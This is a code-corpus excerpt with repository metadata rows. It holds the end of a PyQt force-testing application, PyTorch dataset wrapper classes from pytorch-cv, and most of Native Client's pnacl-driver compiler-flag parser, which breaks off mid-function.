#self.emit(QtCore.SIGNAL("Parando"), 1)
self.Stopsig.emit(1)
lista = [float(deslocamento),float(Forca),maiorvalor[-1]+10,deslocamentos[-1]+10,deslocamentos,forcas]
#self.emit(QtCore.SIGNAL("UP"), lista)
self.UPsig.emit(lista)
if(flag2 == 1 and maxforca != None and float(maxforca) != 0 and float(Forca) >= float(maxforca)):
#self.emit(QtCore.SIGNAL("Parando"), 1)
self.Stopsig.emit(1)
flag2 =0
#self.emit(QtCore.SIGNAL("Parando"), 1)
self.Stopsig.emit(1)
lista = [float(deslocamento),float(Forca),maiorvalor[-1]+10,deslocamentos[-1]+10,deslocamentos,forcas]
self.UPsig.emit(lista)
#self.emit(QtCore.SIGNAL("UP"), lista)
if(flag2 == 1 and qforca != None and float(qforca) != 0 and (float(forcaanterior)*(1 - (float(qforca)/100))) > Forca ):
flag2 =0
for i in range(0,10):
QtTest.QTest.qWait(20)
Forca = celula.getvalue()
tempodecorrido = (time.time() - tempinicioteste)/60
deslocamento = (float(VelocidadeEn))*float(tempodecorrido)
deslocamentos.append(deslocamento)
forcas.append((float(Forca)*9.8))
forcaanterior = forcas[-1]
maiorvalor = forcas.copy()
maiorvalor.sort()
#self.emit(QtCore.SIGNAL("Parando"), 1)
self.Stopsig.emit(1)
lista = [float(deslocamento),float(Forca),maiorvalor[-1]+10,deslocamentos[-1]+10,deslocamentos,forcas]
self.UPsig.emit(lista)
#self.emit(QtCore.SIGNAL("UP"), lista)
flag =0
def run(self):
self.start_server()
def Area(Retangulo_A,Retangulo_B,Tubo_L,Tubo_D,Cilindro_D,Cilindro_H):
global AreaCorpoProva
global FormatoCorpoProva
FormatoCorpoProva = ""
AreaCorpoProva = 0.0
if(Retangulo_A != None and Retangulo_B != None):
#calcular area
AreaCorpoProva = float(Retangulo_A) * float(Retangulo_B)
if(Tubo_L != None and Tubo_D != None):
AreaCorpoProva = math.pi * float(Tubo_L)* float(Tubo_D)
FormatoCorpoProva = "Tubo"
if(Cilindro_D != None and Cilindro_H != None):
AreaCorpoProva = (math.pi*((float(Cilindro_D)*float(Cilindro_H))))+ 2*(math.pi*(float(Cilindro_D)*float(Cilindro_D))/4)
FormatoCorpoProva = "Cilíndrico"
def lotes(nome,x1,x2):
global contando
global testes
global AreaCorpoProva
global VelocidadeEn
global tipodeensaio
global FormatoCorpoProva
testes.append({})
nome=nome+str(contando)
testes[contando]["nome"] = nome
testes[contando]["area"] = AreaCorpoProva
testes[contando]["vel"] = VelocidadeEn
testes[contando]["formato"] = FormatoCorpoProva
testes[contando]["tipo"] =tipodeensaio
testes[contando]["cont"] = contando
testes[contando]["x1"] = x1
testes[contando]["x2"] = x2
contando+=1
if __name__ == "__main__":
app =QtWidgets.QApplication(sys.argv)
myapp = MyForm()
myapp.show()
sys.exit(app.exec_())
| [
"[email protected]"
] | |
ccc95a8679b749bc527794939994aee82257f6dd | 1d182c8cf1ce19019e0b1cba4a16ee1a2a49751e | /data/base.py | d4e7c2318658561292e5f341ea1513223aa70af8 | [
"MIT"
] | permissive | zxt881108/pytorch-cv | e30ac8638a8819b637c6bbef717f733264229126 | 6f2d1760f12c9a56a3e7b19ba74bc41451ea284c | refs/heads/master | 2020-06-18T18:16:09.741626 | 2019-04-29T14:11:06 | 2019-04-29T14:11:06 | 196,396,348 | 5 | 0 | null | 2019-07-11T13:06:29 | 2019-07-11T13:06:28 | null | UTF-8 | Python | false | false | 4,270 | py | """Base dataset methods."""
import os
from torch.utils import data
class ClassProperty(object):
"""Readonly @ClassProperty descriptor for internal usage."""
def __init__(self, fget):
self.fget = fget
def __get__(self, owner_self, owner_cls):
return self.fget(owner_cls)
class SimpleDataset(data.Dataset):
"""Simple Dataset wrapper for lists and arrays.
Parameters
----------
data : dataset-like object
Any object that implements `len()` and `[]`.
"""
def __init__(self, data):
self._data = data
def __len__(self):
return len(self._data)
def __getitem__(self, idx):
return self._data[idx]
class _LazyTransformDataset(data.Dataset):
"""Lazily transformed dataset."""
def __init__(self, data, fn):
super(_LazyTransformDataset, self).__init__()
self._data = data
self._fn = fn
def __len__(self):
return len(self._data)
def __getitem__(self, idx):
item = self._data[idx]
if isinstance(item, tuple):
return self._fn(*item)
return self._fn(item)
def transform(self, fn):
self._fn = fn
class VisionDataset(data.Dataset):
"""Base Dataset with directory checker.
Parameters
----------
root : str
The root path of xxx.names, by default is '~/.mxnet/datasets/foo', where
`foo` is the name of the dataset.
"""
def __init__(self, root):
super(VisionDataset, self).__init__()
if not os.path.isdir(os.path.expanduser(root)):
helper_msg = "{} is not a valid dir. Did you forget to initialize \
datasets described in: \
`http://gluon-cv.mxnet.io/build/examples_datasets/index.html`? \
You need to initialize each dataset only once.".format(root)
raise OSError(helper_msg)
@property
def classes(self):
raise NotImplementedError
@property
def num_class(self):
"""Number of categories."""
return len(self.classes)
def transform(self, fn, lazy=True):
"""Returns a new dataset with each sample transformed by the
transformer function `fn`.
Parameters
----------
fn : callable
A transformer function that takes a sample as input and
returns the transformed sample.
lazy : bool, default True
If False, transforms all samples at once. Otherwise,
transforms each sample on demand. Note that if `fn`
is stochastic, you must set lazy to True or you will
get the same result on all epochs.
Returns
-------
Dataset
The transformed dataset.
"""
trans = _LazyTransformDataset(self, fn)
if lazy:
return trans
return SimpleDataset([i for i in trans])
#### for debug (Note: delete)
from PIL import Image
import numpy as np
class DemoDataset(data.Dataset):
"""Simple Dataset wrapper for lists and arrays.
Parameters
----------
data : dataset-like object
Any object that implements `len()` and `[]`.
"""
def __init__(self, num):
self._num = num
def __len__(self):
return self._num
def __getitem__(self, idx):
return Image.fromarray(np.random.randint(0, 255, size=(60, 60, 3)).astype(np.uint8))
def transform(self, fn, lazy=True):
"""Returns a new dataset with each sample transformed by the
transformer function `fn`.
Parameters
----------
fn : callable
A transformer function that takes a sample as input and
returns the transformed sample.
lazy : bool, default True
If False, transforms all samples at once. Otherwise,
transforms each sample on demand. Note that if `fn`
is stochastic, you must set lazy to True or you will
get the same result on all epochs.
Returns
-------
Dataset
The transformed dataset.
"""
trans = _LazyTransformDataset(self, fn)
if lazy:
return trans
return SimpleDataset([i for i in trans])
| [
"[email protected]"
] | |
96740a5818f496c48cced1e2c40379baf0a7e573 | 600df3590cce1fe49b9a96e9ca5b5242884a2a70 | /native_client/pnacl/driver/pnacl-driver.py | 2ac806f22b80cbb2246dd980fe3d41b59f3c1040 | [
"BSD-3-Clause"
] | permissive | metux/chromium-suckless | efd087ba4f4070a6caac5bfbfb0f7a4e2f3c438a | 72a05af97787001756bae2511b7985e61498c965 | refs/heads/orig | 2022-12-04T23:53:58.681218 | 2017-04-30T10:59:06 | 2017-04-30T23:35:58 | 89,884,931 | 5 | 3 | BSD-3-Clause | 2022-11-23T20:52:53 | 2017-05-01T00:09:08 | null | UTF-8 | Python | false | false | 29,863 | py | #!/usr/bin/python
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
import subprocess
from driver_tools import AddHostBinarySearchPath, DefaultOutputName, \
DefaultPCHOutputName, DriverChain, GetArch, ParseArgs, ParseTriple, \
Run, RunDriver, RunWithEnv, TempNameGen, UnrecognizedOption
from driver_env import env
from driver_log import DriverOpen, Log
import filetype
import pathtools
EXTRA_ENV = {
'ALLOW_TRANSLATE': '0', # Allow bitcode translation before linking.
# It doesn't normally make sense to do this.
'ALLOW_NATIVE' : '0', # Allow native objects (.S,.s,.o) to be in the
# linker line for .pexe generation.
# It doesn't normally make sense to do this.
# CXX_EH_MODE specifies how to deal with C++ exception handling:
# * 'none': Strips out use of C++ exception handling.
# * 'sjlj': Enables the setjmp()+longjmp()-based implementation of
# C++ exception handling.
'CXX_EH_MODE': 'none',
'FORCE_INTERMEDIATE_LL': '0',
# Produce an intermediate .ll file
# Useful for debugging.
# NOTE: potentially different code paths and bugs
# might be triggered by this
'LANGUAGE' : '', # C or CXX (set by SetTool)
'INCLUDE_CXX_HEADERS': '0', # This is set by RunCC.
# Command-line options
'GCC_MODE' : '', # '' (default), '-E', '-c', or '-S'
'SHARED' : '0', # Identify if the target is a shared library.
'STDINC' : '1', # Include standard headers (-nostdinc sets to 0)
'STDINCCXX' : '1', # Include standard cxx headers (-nostdinc++ sets to 0)
'USE_STDLIB' : '1', # Include standard libraries (-nostdlib sets to 0)
'STDLIB' : 'libc++', # C++ Standard Library.
'DEFAULTLIBS' : '1', # Link with default libraries
'DIAGNOSTIC' : '0', # Diagnostic flag detected
'PIC' : '0', # Generate PIC
'NEED_DASH_E' : '0', # Used for stdin inputs, which must have an explicit
# type set (using -x) unless -E is specified.
'VERBOSE' : '0', # Verbose (-v)
'SHOW_VERSION': '0', # Version (--version)
'PTHREAD' : '0', # use pthreads?
'INPUTS' : '', # Input files
'OUTPUT' : '', # Output file
'UNMATCHED' : '', # Unrecognized parameters
'BIAS_NONE' : '',
'BIAS_ARM' : '-D__arm__ -D__ARM_ARCH_7A__ -D__ARMEL__',
'BIAS_MIPS32' : '-D__mips__',
'BIAS_X8632' : '-D__i386__ -D__i386 -D__i686 -D__i686__ -D__pentium4__',
'BIAS_X8664' : '-D__amd64__ -D__amd64 -D__x86_64__ -D__x86_64 -D__core2__',
'BIAS_ARM_NONSFI': '${BIAS_ARM} -D__native_client_nonsfi__',
'BIAS_X8632_NONSFI': '${BIAS_X8632} -D__native_client_nonsfi__',
'FRONTEND_TRIPLE' : 'le32-unknown-nacl',
'OPT_LEVEL' : '', # Default for most tools is 0, but we need to know
# if it's explicitly set or not when the driver
# is only used for linking + translating.
'CC_FLAGS' : '-O${#OPT_LEVEL ? ${OPT_LEVEL} : 0} ' +
'-fno-vectorize -fno-slp-vectorize ' +
'-fno-common ${PTHREAD ? -pthread} ' +
'-nostdinc ${BIAS_%BIAS%} ' +
'-fno-gnu-inline-asm ' +
'-target ${FRONTEND_TRIPLE} ' +
'${IS_CXX ? -fexceptions}',
'ISYSTEM' : '${ISYSTEM_USER} ${STDINC ? ${ISYSTEM_BUILTIN}}',
'ISYSTEM_USER' : '', # System include directories specified by
# using the -isystem flag.
'ISYSTEM_BUILTIN':
'${BASE_USR}/usr/include ' +
'${ISYSTEM_CLANG} ' +
'${ISYSTEM_CXX} ' +
'${BASE_USR}/include ' +
'${BASE_SDK}/include ',
'ISYSTEM_CLANG' : '${BASE_LLVM}/lib/clang/${CLANG_VER}/include',
'ISYSTEM_CXX' :
'${INCLUDE_CXX_HEADERS && STDINCCXX ? ${ISYSTEM_CXX_include_paths}}',
'ISYSTEM_CXX_include_paths' : '${BASE_USR}/include/c++/v1',
# Only propagate opt level to linker if explicitly set, so that the
# linker will know if an opt level was explicitly set or not.
'LD_FLAGS' : '${#OPT_LEVEL ? -O${OPT_LEVEL}} ' +
'${SHARED ? -shared : -static} ' +
'${PIC ? -fPIC} ${@AddPrefix:-L:SEARCH_DIRS} ' +
'--pnacl-exceptions=${CXX_EH_MODE}',
'SEARCH_DIRS' : '', # Directories specified using -L
# Library Strings
'EMITMODE' : '${!USE_STDLIB || SHARED ? nostdlib : static}',
# This is setup so that LD_ARGS_xxx is evaluated lazily.
'LD_ARGS' : '${LD_ARGS_%EMITMODE%}',
# ${ld_inputs} signifies where to place the objects and libraries
# provided on the command-line.
'LD_ARGS_nostdlib': '-nostdlib ${ld_inputs}',
'LD_ARGS_static':
'-l:crt1.x -l:crti.bc -l:crtbegin.bc '
'${CXX_EH_MODE==sjlj ? -l:sjlj_eh_redirect.bc : '
'${CXX_EH_MODE==none ? -l:unwind_stubs.bc}} ' +
'${ld_inputs} ' +
'--start-group ${STDLIBS} --end-group',
'LLVM_PASSES_TO_DISABLE': '',
# Flags for translating to native .o files.
'TRANSLATE_FLAGS' : '-O${#OPT_LEVEL ? ${OPT_LEVEL} : 0}',
'STDLIBS' : '${DEFAULTLIBS ? '
'${LIBSTDCPP} ${LIBPTHREAD} ${LIBNACL} ${LIBC} '
'${LIBGCC_BC} ${LIBPNACLMM}}',
'LIBSTDCPP' : '${IS_CXX ? -lc++ -lm -lpthread }',
# The few functions in the bitcode version of compiler-rt unfortunately
# depend on libm. TODO(jvoung): try rewriting the compiler-rt functions
# to be standalone.
'LIBGCC_BC' : '-lgcc -lm',
'LIBC' : '-lc',
'LIBNACL' : '-lnacl',
'LIBPNACLMM': '-lpnaclmm',
# Enabled/disabled by -pthreads
'LIBPTHREAD': '${PTHREAD ? -lpthread}',
# IS_CXX is set by pnacl-clang and pnacl-clang++ programmatically
'CC' : '${IS_CXX ? ${CLANGXX} : ${CLANG}}',
'RUN_CC': '${CC} ${emit_llvm_flag} ${mode} ${CC_FLAGS} ' +
'${@AddPrefix:-isystem :ISYSTEM} ' +
'-x${typespec} ${infile} -o ${output}',
}
def AddLLVMPassDisableFlag(*args):
env.append('LLVM_PASSES_TO_DISABLE', *args)
env.append('LD_FLAGS', *args)
def AddLDFlag(*args):
env.append('LD_FLAGS', *args)
def AddTranslatorFlag(*args):
# pass translator args to ld in case we go all the way to .nexe
env.append('LD_FLAGS', *['-Wt,' + a for a in args])
# pass translator args to translator in case we go to .o
env.append('TRANSLATE_FLAGS', *args)
def AddCCFlag(*args):
env.append('CC_FLAGS', *args)
def AddDiagnosticFlag(*args):
env.append('CC_FLAGS', *args)
env.set('DIAGNOSTIC', '1')
def SetTarget(*args):
arch = ParseTriple(args[0])
env.set('FRONTEND_TRIPLE', args[0])
AddLDFlag('--target=' + args[0])
def SetStdLib(*args):
"""Set the C++ Standard Library."""
lib = args[0]
if lib != 'libc++':
Log.Fatal('Only libc++ is supported as standard library')
def IsPortable():
return env.getone('FRONTEND_TRIPLE').startswith('le32-')
stdin_count = 0
def AddInputFileStdin():
global stdin_count
# When stdin is an input, -x or -E must be given.
forced_type = filetype.GetForcedFileType()
if not forced_type:
# Only allowed if -E is specified.
forced_type = 'c'
env.set('NEED_DASH_E', '1')
stdin_name = '__stdin%d__' % stdin_count
env.append('INPUTS', stdin_name)
filetype.ForceFileType(stdin_name, forced_type)
stdin_count += 1
def IsStdinInput(f):
return f.startswith('__stdin') and f.endswith('__')
def HandleDashX(arg):
if arg == 'none':
filetype.SetForcedFileType(None)
return
filetype.SetForcedFileType(filetype.GCCTypeToFileType(arg))
def AddVersionFlag(*args):
env.set('SHOW_VERSION', '1')
AddDiagnosticFlag(*args)
def AddBPrefix(prefix):
""" Add a path to the list searched for host binaries and include dirs. """
AddHostBinarySearchPath(prefix)
prefix = pathtools.normalize(prefix)
if pathtools.isdir(prefix) and not prefix.endswith('/'):
prefix += '/'
# Add prefix/ to the library search dir if it exists
if pathtools.isdir(prefix):
env.append('SEARCH_DIRS', prefix)
# Add prefix/include to isystem if it exists
include_dir = prefix + 'include'
if pathtools.isdir(include_dir):
env.append('ISYSTEM_USER', include_dir)
CustomPatterns = [
( '--driver=(.+)', "env.set('CC', pathtools.normalize($0))\n"),
( '--pnacl-allow-native', "env.set('ALLOW_NATIVE', '1')"),
( '--pnacl-allow-translate', "env.set('ALLOW_TRANSLATE', '1')"),
( '--pnacl-frontend-triple=(.+)', SetTarget),
( ('-target','(.+)'), SetTarget),
( ('--target=(.+)'), SetTarget),
( '--pnacl-exceptions=(none|sjlj)', "env.set('CXX_EH_MODE', $0)"),
( '(--pnacl-allow-nexe-build-id)', AddLDFlag),
( '(--pnacl-disable-abi-check)', AddLDFlag),
( '(--pnacl-disable-pass=.+)', AddLLVMPassDisableFlag),
]
GCCPatterns = [
( '-o(.+)', "env.set('OUTPUT', pathtools.normalize($0))"),
( ('-o', '(.+)'), "env.set('OUTPUT', pathtools.normalize($0))"),
( '-E', "env.set('GCC_MODE', '-E')"),
( '-S', "env.set('GCC_MODE', '-S')"),
( '-c', "env.set('GCC_MODE', '-c')"),
( '-nostdinc', "env.set('STDINC', '0')"),
( '-nostdinc\+\+', "env.set('STDINCCXX', '0')"),
( '-nostdlib', "env.set('USE_STDLIB', '0')"),
( '-nodefaultlibs', "env.set('DEFAULTLIBS', '0')"),
( '-?-stdlib=(.*)', SetStdLib),
( ('-?-stdlib', '(.*)'), SetStdLib),
# Flags to pass to native linker
( '(-Wn,.*)', AddLDFlag),
( '-rdynamic', "env.append('LD_FLAGS', '-export-dynamic')"),
# Flags to pass to pnacl-translate
( '-Wt,(.*)', AddTranslatorFlag),
( ('-Xtranslator','(.*)'), AddTranslatorFlag),
# We don't care about -fPIC, but pnacl-ld and pnacl-translate do.
( '-fPIC', "env.set('PIC', '1')"),
# We must include -l, -Xlinker, and -Wl options into the INPUTS
# in the order they appeared. This is the exactly behavior of gcc.
# For example: gcc foo.c -Wl,--start-group -lx -ly -Wl,--end-group
#
( '(-l.+)', "env.append('INPUTS', $0)"),
( ('(-l)','(.+)'), "env.append('INPUTS', $0+$1)"),
( ('-Xlinker','(.*)'), "env.append('INPUTS', '-Xlinker=' + $0)"),
( '(-Wl,.*)', "env.append('INPUTS', $0)"),
( '(-Bstatic)', "env.append('INPUTS', $0)"),
( '(-Bdynamic)', "env.append('INPUTS', $0)"),
( '-O([sz])', "env.set('OPT_LEVEL', $0)\n"),
( '-O([0-3])', "env.set('OPT_LEVEL', $0)\n"),
( '-O([0-9]+)', "env.set('OPT_LEVEL', '3')\n"),
( '-O', "env.set('OPT_LEVEL', '1')\n"),
( ('-isystem', '(.*)'),
"env.append('ISYSTEM_USER', pathtools.normalize($0))"),
( '-isystem(.+)',
"env.append('ISYSTEM_USER', pathtools.normalize($0))"),
( ('-I', '(.+)'), "env.append('CC_FLAGS', '-I'+pathtools.normalize($0))"),
( '-I(.+)', "env.append('CC_FLAGS', '-I'+pathtools.normalize($0))"),
# -I is passed through, so we allow -isysroot and pass it through as well.
# However -L is intercepted and interpreted, so it would take more work
# to handle -sysroot w/ libraries.
( ('-isysroot', '(.+)'),
"env.append('CC_FLAGS', '-isysroot ' + pathtools.normalize($0))"),
( '-isysroot(.+)',
"env.append('CC_FLAGS', '-isysroot ' + pathtools.normalize($0))"),
# NOTE: the -iquote =DIR syntax (substitute = with sysroot) doesn't work.
# Clang just says: ignoring nonexistent directory "=DIR"
( ('-iquote', '(.+)'),
"env.append('CC_FLAGS', '-iquote', pathtools.normalize($0))"),
( ('-iquote(.+)'),
"env.append('CC_FLAGS', '-iquote', pathtools.normalize($0))"),
( ('-idirafter', '(.+)'),
"env.append('CC_FLAGS', '-idirafter'+pathtools.normalize($0))"),
( '-idirafter(.+)',
"env.append('CC_FLAGS', '-idirafter'+pathtools.normalize($0))"),
( ('(-include)','(.+)'), AddCCFlag),
( ('(-include.+)'), AddCCFlag),
( '(--relocatable-pch)', AddCCFlag),
( '(-g)', AddCCFlag),
( '(-W.*)', AddCCFlag),
( '(-w)', AddCCFlag),
( '(-std=.*)', AddCCFlag),
( '(-ansi)', AddCCFlag),
( ('(-D)','(.*)'), AddCCFlag),
( '(-D.+)', AddCCFlag),
( ('(-U)','(.*)'), AddCCFlag),
( '(-U.+)', AddCCFlag),
( '(-f.*)', AddCCFlag),
( '(-pedantic)', AddCCFlag),
( '(-pedantic-errors)', AddCCFlag),
( '(-g.*)', AddCCFlag),
( '(-v|--v)', "env.append('CC_FLAGS', $0)\n"
"env.set('VERBOSE', '1')"),
( '(-pthreads?)', "env.set('PTHREAD', '1')"),
# No-op: accepted for compatibility in case build scripts pass it.
( '-static', ""),
( ('-B','(.*)'), AddBPrefix),
( ('-B(.+)'), AddBPrefix),
( ('-L','(.+)'), "env.append('SEARCH_DIRS', pathtools.normalize($0))"),
( '-L(.+)', "env.append('SEARCH_DIRS', pathtools.normalize($0))"),
( '(-Wp,.*)', AddCCFlag),
( '(-Xpreprocessor .*)', AddCCFlag),
( ('(-Xclang)', '(.*)'), AddCCFlag),
# Accept and ignore default flags
( '-m32', ""),
( '-emit-llvm', ""),
( '(-MG)', AddCCFlag),
( '(-MMD)', AddCCFlag),
( '(-MM?)', "env.append('CC_FLAGS', $0)\n"
"env.set('GCC_MODE', '-E')"),
( '(-MP)', AddCCFlag),
( ('(-MQ)','(.*)'), AddCCFlag),
( '(-MD)', AddCCFlag),
( ('(-MT)','(.*)'), AddCCFlag),
( ('(-MF)','(.*)'), "env.append('CC_FLAGS', $0, pathtools.normalize($1))"),
( ('-x', '(.+)'), HandleDashX),
( '-x(.+)', HandleDashX),
( ('(-mllvm)', '(.+)'), AddCCFlag),
# Ignore these gcc flags
( '(-msse)', ""),
( '(-march=armv7-a)', ""),
( '(-pipe)', ""),
( '(-shared)', "env.set('SHARED', '1')"),
( '(-s)', AddLDFlag),
( '(--strip-all)', AddLDFlag),
( '(--strip-debug)', AddLDFlag),
# Ignore these assembler flags
( '(-Qy)', ""),
( ('(--traditional-format)', '.*'), ""),
( '(-gstabs)', ""),
( '(--gstabs)', ""),
( '(-gdwarf2)', ""),
( '(--gdwarf2)', ""),
( '(--fatal-warnings)', ""),
( '(-meabi=.*)', ""),
( '(-mfpu=.*)', ""),
( '(-mfloat-abi=.+)', AddCCFlag),
# GCC diagnostic mode triggers
( '(-print-.*)', AddDiagnosticFlag),
( '(--print.*)', AddDiagnosticFlag),
( '(-dumpspecs)', AddDiagnosticFlag),
( '(--version)', AddVersionFlag),
# These are preprocessor flags which should be passed to the frontend, but
# should not prevent the usual -i flags (which DIAGNOSTIC mode does)
( '(-d[DIMNU])', AddCCFlag),
( '(-d.*)', AddDiagnosticFlag),
# Catch all other command-line arguments
( '(-.+)', "env.append('UNMATCHED', $0)"),
# Standard input
( '-', AddInputFileStdin),
# Input Files
# Call ForceFileType for all input files at the time they are
# parsed on the command-line. This ensures that the gcc "-x"
# setting is correctly applied.
( '(.*)', "env.append('INPUTS', pathtools.normalize($0))\n"
"filetype.ForceFileType(pathtools.normalize($0))"),
]
def CheckSetup():
if not env.has('IS_CXX'):
Log.Fatal('"pnacl-driver" cannot be used directly. '
'Use pnacl-clang or pnacl-clang++.')
def DriverOutputTypes(driver_flag, compiling_to_native):
output_type_map = {
('-E', False) : 'pp',
('-E', True) : 'pp',
('-c', False) : 'po',
('-c', True) : 'o',
('-S', False) : 'll',
('-S', True) : 's',
('', False) : 'pexe',
('', True) : 'nexe',
}
return output_type_map[(driver_flag, compiling_to_native)]
def ReadDriverRevision():
rev_file = env.getone('DRIVER_REV_FILE')
nacl_ver = DriverOpen(rev_file, 'rb').readlines()[0]
m = re.search(r'\[GIT\].*/native_client(?:\.git)?:\s*([0-9a-f]{40})',
nacl_ver)
if m:
return m.group(1)
# fail-fast: if the REV file exists but regex search failed,
# we need to fix the regex to get nacl-version.
if not m:
Log.Fatal('Failed to parse REV file to get nacl-version.')
def main(argv):
env.update(EXTRA_ENV)
CheckSetup()
ParseArgs(argv, CustomPatterns + GCCPatterns)
# "configure", especially when run as part of a toolchain bootstrap
# process, will invoke gcc with various diagnostic options and
# parse the output. In these cases we do not alter the incoming
# commandline. It is also important to not emit spurious messages.
if env.getbool('DIAGNOSTIC'):
if env.getbool('SHOW_VERSION'):
code, stdout, stderr = Run(env.get('CC') + env.get('CC_FLAGS'),
redirect_stdout=subprocess.PIPE)
out = stdout.split('\n')
nacl_version = ReadDriverRevision()
out[0] += ' nacl-version=%s' % nacl_version
stdout = '\n'.join(out)
print stdout,
else:
Run(env.get('CC') + env.get('CC_FLAGS'))
return 0
unmatched = env.get('UNMATCHED')
if len(unmatched) > 0:
UnrecognizedOption(*unmatched)
# If -arch was given, we are compiling directly to native code
compiling_to_native = GetArch() is not None
if env.getbool('ALLOW_NATIVE'):
if not compiling_to_native:
Log.Fatal("--pnacl-allow-native without -arch is not meaningful.")
# For native/mixed links, also bring in the native libgcc and
# libcrt_platform to avoid link failure if pre-translated native
# code needs functions from it.
env.append('LD_FLAGS', env.eval('-L${LIBS_NATIVE_ARCH}'))
env.append('STDLIBS', '-lgcc')
env.append('STDLIBS', '-lcrt_platform')
flags_and_inputs = env.get('INPUTS')
output = env.getone('OUTPUT')
if len(flags_and_inputs) == 0:
if env.getbool('VERBOSE'):
# -v can be invoked without any inputs. Runs the original
# command without modifying the commandline for this case.
Run(env.get('CC') + env.get('CC_FLAGS'))
return 0
else:
Log.Fatal('No input files')
gcc_mode = env.getone('GCC_MODE')
output_type = DriverOutputTypes(gcc_mode, compiling_to_native)
# '-shared' modifies the output from the linker and should be considered when
# determining the final output type.
if env.getbool('SHARED'):
if compiling_to_native:
Log.Fatal('Building native shared libraries not supported')
if gcc_mode != '':
Log.Fatal('-c, -S, and -E are disallowed with -shared')
output_type = 'pll'
# INPUTS consists of actual input files and a subset of flags like -Wl,<foo>.
# Create a version with just the files.
inputs = [f for f in flags_and_inputs if not IsFlag(f)]
header_inputs = [f for f in inputs
if filetype.IsHeaderType(filetype.FileType(f))]
# Handle PCH case specially (but only for a limited sense...)
if header_inputs and gcc_mode != '-E':
# We only handle doing pre-compiled headers for all inputs or not at
# all at the moment. This is because DriverOutputTypes only assumes
# one type of output, depending on the "gcc_mode" flag. When mixing
# header inputs w/ non-header inputs, some of the outputs will be
# pch while others will be output_type. We would also need to modify
# the input->output chaining for the needs_linking case.
if len(header_inputs) != len(inputs):
Log.Fatal('mixed compiling of headers and source not supported')
CompileHeaders(header_inputs, output)
return 0
needs_linking = (gcc_mode == '')
if env.getbool('NEED_DASH_E') and gcc_mode != '-E':
Log.Fatal("-E or -x required when input is from stdin")
# There are multiple input files and no linking is being done.
# There will be multiple outputs. Handle this case separately.
if not needs_linking:
if output != '' and len(inputs) > 1:
Log.Fatal('Cannot have -o with -c, -S, or -E and multiple inputs: %s',
repr(inputs))
for f in inputs:
intype = filetype.FileType(f)
if not (filetype.IsSourceType(intype) or filetype.IsHeaderType(intype)):
if ((output_type == 'pp' and intype != 'S') or
(output_type == 'll') or
(output_type == 'po' and intype != 'll') or
(output_type == 's' and intype not in ('ll','po','S')) or
(output_type == 'o' and intype not in ('ll','po','S','s'))):
Log.Fatal("%s: Unexpected type of file for '%s'",
pathtools.touser(f), gcc_mode)
if output == '':
f_output = DefaultOutputName(f, output_type)
else:
f_output = output
namegen = TempNameGen([f], f_output)
CompileOne(f, output_type, namegen, f_output)
return 0
# Linking case
assert(needs_linking)
assert(output_type in ('pll', 'pexe', 'nexe'))
if output == '':
output = pathtools.normalize('a.out')
namegen = TempNameGen(flags_and_inputs, output)
# Compile all source files (c/c++/ll) to .po
for i in xrange(0, len(flags_and_inputs)):
if IsFlag(flags_and_inputs[i]):
continue
intype = filetype.FileType(flags_and_inputs[i])
if filetype.IsSourceType(intype) or intype == 'll':
flags_and_inputs[i] = CompileOne(flags_and_inputs[i], 'po', namegen)
# Compile all .s/.S to .o
if env.getbool('ALLOW_NATIVE'):
for i in xrange(0, len(flags_and_inputs)):
if IsFlag(flags_and_inputs[i]):
continue
intype = filetype.FileType(flags_and_inputs[i])
if intype in ('s','S'):
flags_and_inputs[i] = CompileOne(flags_and_inputs[i], 'o', namegen)
# We should only be left with .po and .o and libraries
for f in flags_and_inputs:
if IsFlag(f):
continue
intype = filetype.FileType(f)
if intype in ('o','s','S') or filetype.IsNativeArchive(f):
if not env.getbool('ALLOW_NATIVE'):
Log.Fatal('%s: Native object files not allowed in link. '
'Use --pnacl-allow-native to override.', pathtools.touser(f))
assert(intype in ('po','o','so','ldscript') or filetype.IsArchive(f))
# Fix the user-specified linker arguments
ld_inputs = []
for f in flags_and_inputs:
if f.startswith('-Xlinker='):
ld_inputs.append(f[len('-Xlinker='):])
elif f.startswith('-Wl,'):
ld_inputs += f[len('-Wl,'):].split(',')
else:
ld_inputs.append(f)
if env.getbool('ALLOW_NATIVE'):
ld_inputs.append('--pnacl-allow-native')
# Invoke the linker
env.set('ld_inputs', *ld_inputs)
ld_args = env.get('LD_ARGS')
ld_flags = env.get('LD_FLAGS')
RunDriver('pnacl-ld', ld_flags + ld_args + ['-o', output])
return 0
def IsFlag(f):
return f.startswith('-')
def CompileHeaders(header_inputs, output):
if output != '' and len(header_inputs) > 1:
Log.Fatal('Cannot have -o <out> and compile multiple header files: %s',
repr(header_inputs))
for f in header_inputs:
f_output = output if output else DefaultPCHOutputName(f)
RunCC(f, f_output, mode='', emit_llvm_flag='')
def CompileOne(infile, output_type, namegen, output = None):
if output is None:
output = namegen.TempNameForInput(infile, output_type)
chain = DriverChain(infile, output, namegen)
SetupChain(chain, filetype.FileType(infile), output_type)
chain.run()
return output
def RunCC(infile, output, mode, emit_llvm_flag='-emit-llvm'):
intype = filetype.FileType(infile)
typespec = filetype.FileTypeToGCCType(intype)
include_cxx_headers = ((env.get('LANGUAGE') == 'CXX') or
(intype in ('c++', 'c++-header')))
env.setbool('INCLUDE_CXX_HEADERS', include_cxx_headers)
if IsStdinInput(infile):
infile = '-'
RunWithEnv("${RUN_CC}", infile=infile, output=output,
emit_llvm_flag=emit_llvm_flag, mode=mode,
typespec=typespec)
def RunLLVMAS(infile, output):
if IsStdinInput(infile):
infile = '-'
# This is a bitcode only step - so get rid of "-arch xxx" which
# might be inherited from the current invocation
RunDriver('pnacl-as', [infile, '-o', output],
suppress_inherited_arch_args=True)
def RunNativeAS(infile, output):
if IsStdinInput(infile):
infile = '-'
RunDriver('pnacl-as', [infile, '-o', output])
def RunTranslate(infile, output, mode):
if not env.getbool('ALLOW_TRANSLATE'):
Log.Fatal('%s: Trying to convert bitcode to an object file before '
'bitcode linking. This is supposed to wait until '
'translation. Use --pnacl-allow-translate to override.',
pathtools.touser(infile))
args = env.get('TRANSLATE_FLAGS') + [mode, '--allow-llvm-bitcode-input',
infile, '-o', output]
if env.getbool('PIC'):
args += ['-fPIC']
RunDriver('pnacl-translate', args)
def RunOpt(infile, outfile, pass_list):
filtered_list = [pass_option for pass_option in pass_list
if pass_option not in env.get('LLVM_PASSES_TO_DISABLE')]
RunDriver('pnacl-opt', filtered_list + [infile, '-o', outfile])
def SetupChain(chain, input_type, output_type):
